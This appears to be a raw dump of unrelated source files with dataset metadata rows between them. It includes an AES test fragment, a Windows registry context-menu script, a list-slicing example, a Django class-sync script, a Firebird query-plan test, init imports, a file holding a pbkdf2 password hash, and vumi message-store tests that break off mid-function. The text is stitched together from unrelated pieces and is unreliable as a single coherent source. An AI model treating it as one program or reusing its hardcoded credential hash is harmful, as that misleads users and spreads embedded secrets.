aes_cipher.encrypt_blocks(test_cipher2, test_object2)
aes_cipher.decrypt_blocks(test_decipher2, test_cipher2)
aes_cipher.decrypt_blocks(test_decipher, test_cipher)
assert test_decipher.tobytes() == test_object.tobytes()
aes_cipher2.encrypt_blocks(test_cipher2, test_object)
aes_cipher2.decrypt_blocks(test_decipher2, test_cipher2)
assert test_decipher2.tobytes() == test_object.tobytes()
assert test_cipher2.tobytes() == test_cipher.tobytes()
aes_cipher.encrypt(test_cipher, test_object)
aes_cipher.decrypt(test_decipher, test_cipher)
assert test_decipher.tobytes() == test_object.tobytes()
| 50.142857
| 87
| 0.772713
| 394
| 3,159
| 5.847716
| 0.109137
| 0.108507
| 0.056424
| 0.09375
| 0.924479
| 0.91059
| 0.863715
| 0.823351
| 0.730469
| 0.694878
| 0
| 0.082366
| 0.127572
| 3,159
| 62
| 88
| 50.951613
| 0.753628
| 0.014245
| 0
| 0.714286
| 0
| 0
| 0.082262
| 0.061697
| 0
| 0
| 0
| 0
| 0.214286
| 1
| 0.017857
| false
| 0
| 0.017857
| 0
| 0.035714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
71ddc02c1aed3d04ec80e3e8bfd2b8bd92f074d7
| 255
|
py
|
Python
|
tools/SLOC/register.py
|
tkgamegroup/flame
|
f1628100cc66e13f84ea3047ea33af019caeb01b
|
[
"MIT"
] | 25
|
2018-02-28T05:59:50.000Z
|
2022-03-18T03:11:52.000Z
|
tools/SLOC/register.py
|
tkgamegroup/flame
|
e5884c7a773c351f3dadadbdb908cfe00f1ce586
|
[
"MIT"
] | null | null | null |
tools/SLOC/register.py
|
tkgamegroup/flame
|
e5884c7a773c351f3dadadbdb908cfe00f1ce586
|
[
"MIT"
] | 5
|
2018-05-17T04:16:30.000Z
|
2021-12-22T04:02:02.000Z
|
import os
os.system("reg add HKEY_CLASSES_ROOT\\Directory\\Background\\shell\\SLOC /VE /F /D SLOC")
os.system("reg add HKEY_CLASSES_ROOT\\Directory\\Background\\shell\\SLOC\\Command /VE /F /D %s\\SLOC.exe" % (os.environ["FLAME_PATH"] + "\\bin\\debug"))
| 51
| 152
| 0.705882
| 42
| 255
| 4.190476
| 0.571429
| 0.090909
| 0.125
| 0.159091
| 0.647727
| 0.647727
| 0.647727
| 0.647727
| 0.647727
| 0.647727
| 0
| 0
| 0.082353
| 255
| 4
| 153
| 63.75
| 0.747863
| 0
| 0
| 0
| 0
| 0.333333
| 0.751969
| 0.452756
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.333333
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
71df626f82a9fa821bd2af7c65f43f36d3310484
| 132
|
py
|
Python
|
59_slicing_the_lists.py
|
rahulbohra/Python-Basic
|
7dfadde341e9d02fdcb37f70cce10e8b689f36c9
|
[
"MIT"
] | null | null | null |
59_slicing_the_lists.py
|
rahulbohra/Python-Basic
|
7dfadde341e9d02fdcb37f70cce10e8b689f36c9
|
[
"MIT"
] | null | null | null |
59_slicing_the_lists.py
|
rahulbohra/Python-Basic
|
7dfadde341e9d02fdcb37f70cce10e8b689f36c9
|
[
"MIT"
] | null | null | null |
a = [1, 2, 3, 4, 5, 6, 7, 8, 9]
print(a[1:3])
# [2, 3]
print(a[:5])
# [1, 2, 3, 4, 5]
print(a[3:])
# [4, 5, 6, 7, 8, 9]
print(a[:])
# [1, 2, 3, 4, 5, 6, 7, 8, 9]
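# A couple of further slices (editor's addition; same list as above):
print(a[::2])
# [1, 3, 5, 7, 9]  every second element
print(a[::-1])
# [9, 8, 7, 6, 5, 4, 3, 2, 1]  reversed copy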
| 10.153846
| 23
| 0.454545
| 44
| 132
| 1.363636
| 0.25
| 0.133333
| 0.2
| 0.2
| 0.733333
| 0.65
| 0.65
| 0.65
| 0.65
| 0.65
| 0
| 0.309735
| 0.143939
| 132
| 12
| 24
| 11
| 0.221239
| 0.363636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.8
| 0
| 0
| 1
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
e0b6afe617622c6804ebedbba6700cf1f2e451f0
| 5,472
|
py
|
Python
|
BCM_and_Week_Report_Data/fake_newclass.py
|
Kiritox0x/trp_assistant_bot
|
9776d3b6fc6ebccb5d6b8c0ea68c9b145dc4e06a
|
[
"MIT"
] | null | null | null |
BCM_and_Week_Report_Data/fake_newclass.py
|
Kiritox0x/trp_assistant_bot
|
9776d3b6fc6ebccb5d6b8c0ea68c9b145dc4e06a
|
[
"MIT"
] | null | null | null |
BCM_and_Week_Report_Data/fake_newclass.py
|
Kiritox0x/trp_assistant_bot
|
9776d3b6fc6ebccb5d6b8c0ea68c9b145dc4e06a
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
import requests
import json
import os
import sys
from datetime import *
import pytz
import django
sys.path.append("/home/khoaitaymocmam/Work/WebAPI/Topica/trm_assistant_bot/")
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "trp_assistant_bot.settings")
django.setup()
from mail_sender.models import *
def user_info(userId):
url = "http://elearning.hou2.topica.vn/api/apittm/api_user_info.php"
querystring = {"userId":userId}
headers = {
'cache-control': "no-cache",
}
print(querystring)
response = requests.request("GET", url, headers=headers, params=querystring)
response = json.loads(response.text)
return response["data"][0]
# Get list of activating classes
now = datetime.now(pytz.utc)
now = now.strftime('%m/%d/%Y')
def get_activating_class():
url = "http://elearning.hou2.topica.vn/api/apittm/api_post_bcm.php"
querystring = {"start_date": now,"end_date": now}
headers = {
'cache-control': "no-cache",
}
response = requests.request("GET", url, headers=headers, params=querystring)
response = json.loads(response.text)
return response["data"]
def get_account(string):
for i in range (len(string)):
if string[i] == "@":
return string[0:i]
def create_BCM(newclass_report):
if len(Bcm_room.objects.filter(subject_code = newclass_report["subject_code"])) == 0:
classroom = Bcm_room.objects.create()
# check if subject name exist
if newclass_report["subject_name"] != None:
classroom.subject_name = newclass_report["subject_name"]
else:
classroom.subject_name = "No subject name"
# check if teacher exist in open_course database, if not exist return null
if newclass_report["id_gvcm"] != None:
teacher = user_info(newclass_report["id_gvcm"])
teacher_email = teacher["email"]
teacher_account = get_account(teacher_email)
if len(Teacher.objects.filter(account = teacher_account)) != 0:
classroom.teacher = Teacher.objects.filter(account = teacher_account)[0]
# check if assistant exist in open_course database, if not exist return null
if newclass_report["id_gvhd"] != None:
assistant = user_info(newclass_report["id_gvhd"])
assistant_email = assistant["email"]
assistant_account = get_account(assistant_email)
if len(Assistant.objects.filter(account = assistant_account)) !=0:
classroom.assistant = Assistant.objects.filter(account = assistant_account)[0]
classroom.subject_code = newclass_report["subject_code"]
classroom.class_link = newclass_report["class_link"]
classroom.document_link = newclass_report["document_link"]
# set_time
classroom.start_date = datetime.strptime(newclass_report["start_course"], '%m-%d-%Y')
classroom.start_date = classroom.start_date.replace(tzinfo=pytz.utc)
classroom.finish_date = datetime.strptime(newclass_report["end_course"], '%m-%d-%Y')
classroom.finish_date = classroom.finish_date.replace(tzinfo=pytz.UTC)
classroom.examination_date = datetime.strptime(newclass_report["date_exam"] , '%m-%d-%Y')
classroom.examination_date = classroom.examination_date.replace(tzinfo = pytz.UTC)
if newclass_report["date_post_bcm"] != "NF":
classroom.date_post_BCM = datetime.strptime(newclass_report["date_post_bcm"], '%d-%m-%Y')
classroom.date_post_BCM = classroom.date_post_BCM.replace(tzinfo = pytz.UTC)
classroom.save()
else:
classroom = Bcm_room.objects.filter(subject_code = newclass_report["subject_code"])
classroom = classroom.get()
if newclass_report["subject_name"] != None:
classroom.subject_name = newclass_report["subject_name"]
else:
classroom.subject_name = "No subject name"
# check if teacher exist in open_course database, if not exist return null
if newclass_report["id_gvcm"] != None:
teacher = user_info(newclass_report["id_gvcm"])
teacher_email = teacher["email"]
teacher_account = get_account(teacher_email)
if len(Teacher.objects.filter(account = teacher_account)) != 0:
classroom.teacher = Teacher.objects.filter(account = teacher_account)[0]
# check if assistant exist in open_course database, if not exist return null
if newclass_report["id_gvhd"] != None:
assistant = user_info(newclass_report["id_gvhd"])
assistant_email = assistant["email"]
assistant_account = get_account(assistant_email)
if len(Assistant.objects.filter(account = assistant_account)) !=0:
classroom.assistant = Assistant.objects.filter(account = assistant_account)[0]
classroom.subject_code = newclass_report["subject_code"]
classroom.class_link = newclass_report["class_link"]
classroom.document_link = newclass_report["document_link"]
# set_time
classroom.start_date = datetime.strptime(newclass_report["start_course"], '%m-%d-%Y')
classroom.start_date = classroom.start_date.replace(tzinfo=pytz.utc)
classroom.finish_date = datetime.strptime(newclass_report["end_course"], '%m-%d-%Y')
classroom.finish_date = classroom.finish_date.replace(tzinfo=pytz.UTC)
classroom.examination_date = datetime.strptime(newclass_report["date_exam"] , '%m-%d-%Y')
classroom.examination_date = classroom.examination_date.replace(tzinfo = pytz.UTC)
if newclass_report["date_post_bcm"] != "NF":
classroom.date_post_BCM = datetime.strptime(newclass_report["date_post_bcm"], '%d-%m-%Y')
classroom.date_post_BCM = classroom.date_post_BCM.replace(tzinfo = pytz.UTC)
classroom.save()
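# Fetch today's activating classes and create or update a Bcm_room record
# for each one.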
database = get_activating_class()
for obj in database:
create_BCM(obj)
print "Get New Class Successfully"
| 39.366906
| 92
| 0.74799
| 730
| 5,472
| 5.382192
| 0.167123
| 0.110461
| 0.027997
| 0.061084
| 0.819801
| 0.806567
| 0.806567
| 0.804276
| 0.804276
| 0.783914
| 0
| 0.002713
| 0.124452
| 5,472
| 138
| 93
| 39.652174
| 0.817366
| 0.071455
| 0
| 0.625
| 0
| 0
| 0.151814
| 0.020899
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.076923
| null | null | 0.019231
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e0e9337d361352074861d1294373b19346792019
| 4,887
|
py
|
Python
|
tests/bugs/core_0908_test.py
|
reevespaul/firebird-qa
|
98f16f425aa9ab8ee63b86172f959d63a2d76f21
|
[
"MIT"
] | null | null | null |
tests/bugs/core_0908_test.py
|
reevespaul/firebird-qa
|
98f16f425aa9ab8ee63b86172f959d63a2d76f21
|
[
"MIT"
] | null | null | null |
tests/bugs/core_0908_test.py
|
reevespaul/firebird-qa
|
98f16f425aa9ab8ee63b86172f959d63a2d76f21
|
[
"MIT"
] | null | null | null |
#coding:utf-8
#
# id: bugs.core_0908
# title: Garbage in plan output of complex statement
# description: This is an unfortunate case. The fix for 2.1 went through several "adjustments" and we got lost in the changes. The result is that this was not properly fixed in the 2.1 line (the server doesn't crash, but it doesn't return the truncated plan as supposed either). Now that the 2.1 line is at 2.1.3 we can hope for a proper fix in 2.1.4. It should work as intended in the 2.5 line.
# tracker_id: CORE-908
# min_versions: []
# versions: 3.0
# qmid: bugs.core_908
import pytest
from firebird.qa import db_factory, isql_act, Action
# version: 3.0
# resources: None
substitutions_1 = []
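# The init script below repeats the same trivial SELECT roughly a hundred
# times so that the stored procedure's combined plan becomes very long; the
# original bug was garbage appearing in the plan output of such a complex
# statement (see the title above).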
init_script_1 = """set term ^;
create procedure big_plan
returns (x integer)
as
begin
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
select 1 from rdb$database into :x;
/* select 1 from rdb$relations into :x; */
suspend;
end ^
set term ;^
"""
db_1 = db_factory(sql_dialect=3, init=init_script_1)
test_script_1 = """set plan on;
select * from big_plan ;
"""
act_1 = isql_act('db_1', test_script_1, substitutions=substitutions_1)
expected_stdout_1 = """PLAN (BIG_PLAN NATURAL)
X
============
1
"""
@pytest.mark.version('>=3.0')
def test_1(act_1: Action):
act_1.expected_stdout = expected_stdout_1
act_1.execute()
assert act_1.clean_expected_stdout == act_1.clean_stdout
| 31.733766
| 370
| 0.707592
| 879
| 4,887
| 3.889647
| 0.13083
| 0.194501
| 0.305645
| 0.389003
| 0.746417
| 0.746417
| 0.746417
| 0.746417
| 0.746417
| 0.746417
| 0
| 0.037313
| 0.204829
| 4,887
| 153
| 371
| 31.941176
| 0.842512
| 0.119296
| 0
| 0.795082
| 0
| 0
| 0.888164
| 0
| 0
| 0
| 0
| 0
| 0.008197
| 1
| 0.008197
| false
| 0
| 0.016393
| 0
| 0.02459
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
46101db436af02330538445ce962914693fb56c9
| 98
|
py
|
Python
|
app/blueprints/jobs/__init__.py
|
Anioko/TestApp
|
95fa8d27ca8e7a074e62f92609427a378844e621
|
[
"MIT"
] | null | null | null |
app/blueprints/jobs/__init__.py
|
Anioko/TestApp
|
95fa8d27ca8e7a074e62f92609427a378844e621
|
[
"MIT"
] | 1
|
2021-06-02T01:53:47.000Z
|
2021-06-02T01:53:47.000Z
|
app/blueprints/jobs/__init__.py
|
Anioko/TestApp
|
95fa8d27ca8e7a074e62f92609427a378844e621
|
[
"MIT"
] | null | null | null |
from app.blueprints.jobs import errors # noqa
from app.blueprints.jobs.views import jobs # noqa
| 32.666667
| 50
| 0.785714
| 15
| 98
| 5.133333
| 0.533333
| 0.181818
| 0.441558
| 0.545455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 98
| 2
| 51
| 49
| 0.916667
| 0.091837
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 8
|
46182e6d440f7bf10de7f2c8e48fc383a8e6e5a5
| 85
|
py
|
Python
|
lib/loss/__init__.py
|
REI-ZERO-Y/waifu2x-chainer
|
27ece822d24e8ed76a632c2cf0ff9e6b8e6b2abb
|
[
"MIT"
] | 150
|
2017-01-05T17:22:32.000Z
|
2022-02-26T22:05:30.000Z
|
lib/loss/__init__.py
|
REI-ZERO-Y/waifu2x-chainer
|
27ece822d24e8ed76a632c2cf0ff9e6b8e6b2abb
|
[
"MIT"
] | 33
|
2017-09-18T05:38:26.000Z
|
2022-03-28T09:45:54.000Z
|
lib/loss/__init__.py
|
REI-ZERO-Y/waifu2x-chainer
|
27ece822d24e8ed76a632c2cf0ff9e6b8e6b2abb
|
[
"MIT"
] | 46
|
2017-07-27T09:24:06.000Z
|
2021-12-04T07:47:32.000Z
|
from lib.loss.clipped_weighted_huber_loss import clipped_weighted_huber_loss # NOQA
| 42.5
| 84
| 0.882353
| 13
| 85
| 5.307692
| 0.615385
| 0.434783
| 0.57971
| 0.695652
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.082353
| 85
| 1
| 85
| 85
| 0.884615
| 0.047059
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
1cc815e8db981e42050608568de5cb42cd4e5d56
| 92
|
py
|
Python
|
parameters_8000.py
|
hadarrah/Shots_Manager
|
79b187d03d60ecefa8406e19b37ac45e76ea89ec
|
[
"BSD-3-Clause"
] | null | null | null |
parameters_8000.py
|
hadarrah/Shots_Manager
|
79b187d03d60ecefa8406e19b37ac45e76ea89ec
|
[
"BSD-3-Clause"
] | null | null | null |
parameters_8000.py
|
hadarrah/Shots_Manager
|
79b187d03d60ecefa8406e19b37ac45e76ea89ec
|
[
"BSD-3-Clause"
] | null | null | null |
password="pbkdf2(1000,20,sha512)$836d496047184fe4$49914946f0d1681dd5c1866909d35895cdaf1085"
| 46
| 91
| 0.891304
| 7
| 92
| 11.714286
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.582418
| 0.01087
| 92
| 1
| 92
| 92
| 0.318681
| 0
| 0
| 0
| 0
| 0
| 0.869565
| 0.869565
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
1c001541aac8150cff0aa147dd55dab29535f35d
| 81,214
|
py
|
Python
|
vumi/components/tests/test_message_store.py
|
seidu626/vumi
|
62eae205a07029bc7ab382086715694548001876
|
[
"BSD-3-Clause"
] | 199
|
2015-01-05T09:04:24.000Z
|
2018-08-15T17:02:49.000Z
|
vumi/components/tests/test_message_store.py
|
seidu626/vumi
|
62eae205a07029bc7ab382086715694548001876
|
[
"BSD-3-Clause"
] | 187
|
2015-01-06T15:22:38.000Z
|
2018-07-14T13:15:29.000Z
|
vumi/components/tests/test_message_store.py
|
seidu626/vumi
|
62eae205a07029bc7ab382086715694548001876
|
[
"BSD-3-Clause"
] | 86
|
2015-01-31T02:47:08.000Z
|
2018-12-01T11:59:47.000Z
|
# -*- coding: utf-8 -*-
"""Tests for vumi.components.message_store."""
import time
from datetime import datetime, timedelta
from twisted.internet.defer import inlineCallbacks, returnValue
from vumi.message import TransportEvent, format_vumi_date
from vumi.tests.helpers import (
VumiTestCase, MessageHelper, PersistenceHelper, import_skip)
try:
from vumi.components.message_store import (
MessageStore, to_reverse_timestamp, from_reverse_timestamp,
add_batches_to_event)
except ImportError as e:
import_skip(e, 'riak')
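# zero_ms() replaces the microsecond digits of a formatted timestamp with
# zeros, e.g. "...12:13:14.123456" -> "...12:13:14.000000"; reverse
# timestamps only carry whole-second precision, so the reverse-index tests
# below compare against zeroed timestamps.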
def zero_ms(timestamp):
dt, dot, ms = format_vumi_date(timestamp).partition(".")
return dot.join([dt, "0" * len(ms)])
class TestReverseTimestampUtils(VumiTestCase):
def test_to_reverse_timestamp(self):
"""
to_reverse_timestamp() turns a vumi_date-formatted string into a
reverse timestamp.
"""
self.assertEqual(
"FFAAE41F25", to_reverse_timestamp("2015-04-01 12:13:14"))
self.assertEqual(
"FFAAE41F25", to_reverse_timestamp("2015-04-01 12:13:14.000000"))
self.assertEqual(
"FFAAE41F25", to_reverse_timestamp("2015-04-01 12:13:14.999999"))
self.assertEqual(
"FFAAE41F24", to_reverse_timestamp("2015-04-01 12:13:15"))
self.assertEqual(
"F0F9025FA5", to_reverse_timestamp("4015-04-01 12:13:14"))
def test_from_reverse_timestamp(self):
"""
from_reverse_timestamp() is the inverse of to_reverse_timestamp().
"""
self.assertEqual(
"2015-04-01 12:13:14.000000", from_reverse_timestamp("FFAAE41F25"))
self.assertEqual(
"2015-04-01 12:13:13.000000", from_reverse_timestamp("FFAAE41F26"))
self.assertEqual(
"4015-04-01 12:13:14.000000", from_reverse_timestamp("F0F9025FA5"))
class TestMessageStoreBase(VumiTestCase):
@inlineCallbacks
def setUp(self):
self.persistence_helper = self.add_helper(
PersistenceHelper(use_riak=True))
self.redis = yield self.persistence_helper.get_redis_manager()
self.manager = self.persistence_helper.get_riak_manager()
self.add_cleanup(self.manager.close_manager)
self.store = MessageStore(self.manager, self.redis)
self.msg_helper = self.add_helper(MessageHelper())
@inlineCallbacks
def _maybe_batch(self, tag, by_batch):
add_kw, batch_id = {}, None
if tag is not None:
batch_id = yield self.store.batch_start([tag])
if by_batch:
add_kw['batch_id'] = batch_id
else:
add_kw['tag'] = tag
returnValue((add_kw, batch_id))
@inlineCallbacks
def _create_outbound(self, tag=("pool", "tag"), by_batch=False,
content='outbound foo'):
"""Create and store an outbound message."""
add_kw, batch_id = yield self._maybe_batch(tag, by_batch)
msg = self.msg_helper.make_outbound(content)
msg_id = msg['message_id']
yield self.store.add_outbound_message(msg, **add_kw)
returnValue((msg_id, msg, batch_id))
@inlineCallbacks
def _create_inbound(self, tag=("pool", "tag"), by_batch=False,
content='inbound foo'):
"""Create and store an inbound message."""
add_kw, batch_id = yield self._maybe_batch(tag, by_batch)
msg = self.msg_helper.make_inbound(
content, to_addr="+1234567810001", transport_type="sms")
msg_id = msg['message_id']
yield self.store.add_inbound_message(msg, **add_kw)
returnValue((msg_id, msg, batch_id))
@inlineCallbacks
def create_outbound_messages(self, batch_id, count, start_timestamp=None,
time_multiplier=10, to_addr=None):
# Store via message_store
now = start_timestamp or datetime.now()
messages = []
for i in range(count):
msg = self.msg_helper.make_outbound(
"foo", timestamp=(now - timedelta(i * time_multiplier)))
if to_addr is not None:
msg['to_addr'] = to_addr
yield self.store.add_outbound_message(msg, batch_id=batch_id)
messages.append(msg)
returnValue(messages)
def _create_event(self, event_type, timestamp):
maker = {
'ack': self.msg_helper.make_ack,
'nack': self.msg_helper.make_nack,
'delivery_report': self.msg_helper.make_delivery_report,
}[event_type]
return maker(timestamp=timestamp)
@inlineCallbacks
def create_events(self, batch_id, count, start_timestamp=None,
time_multiplier=10, event_mix=None):
# Store via message_store
now = start_timestamp or datetime.now()
events = []
if event_mix is None:
event_mix = ['ack', 'nack', 'delivery_report']
event_types = (event_mix * count)[:count]
for i, event_type in enumerate(event_types):
ev = self._create_event(
event_type, timestamp=(now - timedelta(i * time_multiplier)))
yield self.store.add_event(ev, batch_ids=[batch_id])
events.append(ev)
returnValue(events)
@inlineCallbacks
def create_inbound_messages(self, batch_id, count, start_timestamp=None,
time_multiplier=10, from_addr=None):
# Store via message_store
now = start_timestamp or datetime.now()
messages = []
for i in range(count):
msg = self.msg_helper.make_inbound(
"foo", timestamp=(now - timedelta(i * time_multiplier)))
if from_addr is not None:
msg['from_addr'] = from_addr
yield self.store.add_inbound_message(msg, batch_id=batch_id)
messages.append(msg)
returnValue(messages)
def _batch_status(self, ack=0, nack=0, delivered=0, failed=0, pending=0,
sent=0):
return {
'ack': ack, 'nack': nack, 'sent': sent,
'delivery_report': sum([delivered, failed, pending]),
'delivery_report.delivered': delivered,
'delivery_report.failed': failed,
'delivery_report.pending': pending,
}
class TestMessageStore(TestMessageStoreBase):
@inlineCallbacks
def test_batch_start(self):
tag1 = ("poolA", "tag1")
batch_id = yield self.store.batch_start([tag1])
batch = yield self.store.get_batch(batch_id)
tag_info = yield self.store.get_tag_info(tag1)
outbound_keys = yield self.store.batch_outbound_keys(batch_id)
batch_status = yield self.store.batch_status(batch_id)
self.assertEqual(outbound_keys, [])
self.assertEqual(list(batch.tags), [tag1])
self.assertEqual(tag_info.current_batch.key, batch_id)
self.assertEqual(batch_status, self._batch_status())
@inlineCallbacks
def test_batch_start_with_metadata(self):
batch_id = yield self.store.batch_start([], key1=u"foo", key2=u"bar")
batch = yield self.store.get_batch(batch_id)
self.assertEqual(batch.metadata['key1'], "foo")
self.assertEqual(batch.metadata['key2'], "bar")
@inlineCallbacks
def test_batch_done(self):
tag1 = ("poolA", "tag1")
batch_id = yield self.store.batch_start([tag1])
yield self.store.batch_done(batch_id)
batch = yield self.store.get_batch(batch_id)
tag_info = yield self.store.get_tag_info(tag1)
self.assertEqual(list(batch.tags), [tag1])
self.assertEqual(tag_info.current_batch.key, None)
@inlineCallbacks
def test_add_outbound_message(self):
msg_id, msg, _batch_id = yield self._create_outbound(tag=None)
stored_msg = yield self.store.get_outbound_message(msg_id)
self.assertEqual(stored_msg, msg)
event_keys = yield self.store.message_event_keys(msg_id)
self.assertEqual(event_keys, [])
@inlineCallbacks
def test_add_outbound_message_again(self):
msg_id, msg, _batch_id = yield self._create_outbound(tag=None)
old_stored_msg = yield self.store.get_outbound_message(msg_id)
self.assertEqual(old_stored_msg, msg)
msg['helper_metadata']['foo'] = {'bar': 'baz'}
yield self.store.add_outbound_message(msg)
new_stored_msg = yield self.store.get_outbound_message(msg_id)
self.assertEqual(new_stored_msg, msg)
self.assertNotEqual(old_stored_msg, new_stored_msg)
@inlineCallbacks
def test_add_outbound_message_with_batch_id(self):
msg_id, msg, batch_id = yield self._create_outbound(by_batch=True)
stored_msg = yield self.store.get_outbound_message(msg_id)
outbound_keys = yield self.store.batch_outbound_keys(batch_id)
event_keys = yield self.store.message_event_keys(msg_id)
batch_status = yield self.store.batch_status(batch_id)
self.assertEqual(stored_msg, msg)
self.assertEqual(outbound_keys, [msg_id])
self.assertEqual(event_keys, [])
self.assertEqual(batch_status, self._batch_status(sent=1))
@inlineCallbacks
def test_add_outbound_message_with_tag(self):
msg_id, msg, batch_id = yield self._create_outbound()
stored_msg = yield self.store.get_outbound_message(msg_id)
outbound_keys = yield self.store.batch_outbound_keys(batch_id)
event_keys = yield self.store.message_event_keys(msg_id)
batch_status = yield self.store.batch_status(batch_id)
self.assertEqual(stored_msg, msg)
self.assertEqual(outbound_keys, [msg_id])
self.assertEqual(event_keys, [])
self.assertEqual(batch_status, self._batch_status(sent=1))
@inlineCallbacks
def test_add_outbound_message_to_multiple_batches(self):
msg_id, msg, batch_id_1 = yield self._create_outbound()
batch_id_2 = yield self.store.batch_start()
yield self.store.add_outbound_message(msg, batch_id=batch_id_2)
self.assertEqual(
(yield self.store.batch_outbound_keys(batch_id_1)), [msg_id])
self.assertEqual(
(yield self.store.batch_outbound_keys(batch_id_2)), [msg_id])
# Make sure we're writing the right indexes.
stored_msg = yield self.store.outbound_messages.load(msg_id)
timestamp = format_vumi_date(msg['timestamp'])
reverse_ts = to_reverse_timestamp(timestamp)
